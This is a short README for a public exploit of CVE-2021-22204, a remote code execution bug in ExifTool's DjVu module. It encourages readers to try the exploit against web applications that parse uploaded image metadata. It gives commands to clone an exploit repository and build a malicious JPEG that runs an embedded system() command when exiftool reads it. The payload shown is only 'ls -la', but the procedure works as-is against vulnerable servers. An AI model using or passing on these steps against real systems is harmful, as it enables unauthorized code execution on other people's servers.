Exiftool bug which leads to RCE
CVE-2021-22204 - RCE
*REFFERENCE*
Related hackerone report : https://hackerone.com/reports/1154542
VULNERABILITY
ExifTool 7.44 to 12.23 has a bug in the DjVu module which allows for arbitrary code execution when parsing malicious images.
REQUIREMENTS
if you are using other image ,it should be a valid jpeg/jpg file
You can check that with exiftool
The meta-data should be :
MIME Type : image/jpeg"
EXPLOIT VECTOR
If the web application has a feature of uploading image and if the application is parsing the metadata of the uploaded image file using exiftool, you can always give a try with this exploit
NOTE
The exiftool version should be between 7.44 to 12.23.
COMMAND (exploit)
git clone https://github.com/OneSecCyber/JPEG_RCE.git
cd JPEG_RCE
exiftool -config eval.config runme.jpg -eval='system("ls -la")'
It will create malicious jpg file
Upload the file or run the file in you local system to see the magic..
exiftool runme.jpg
POC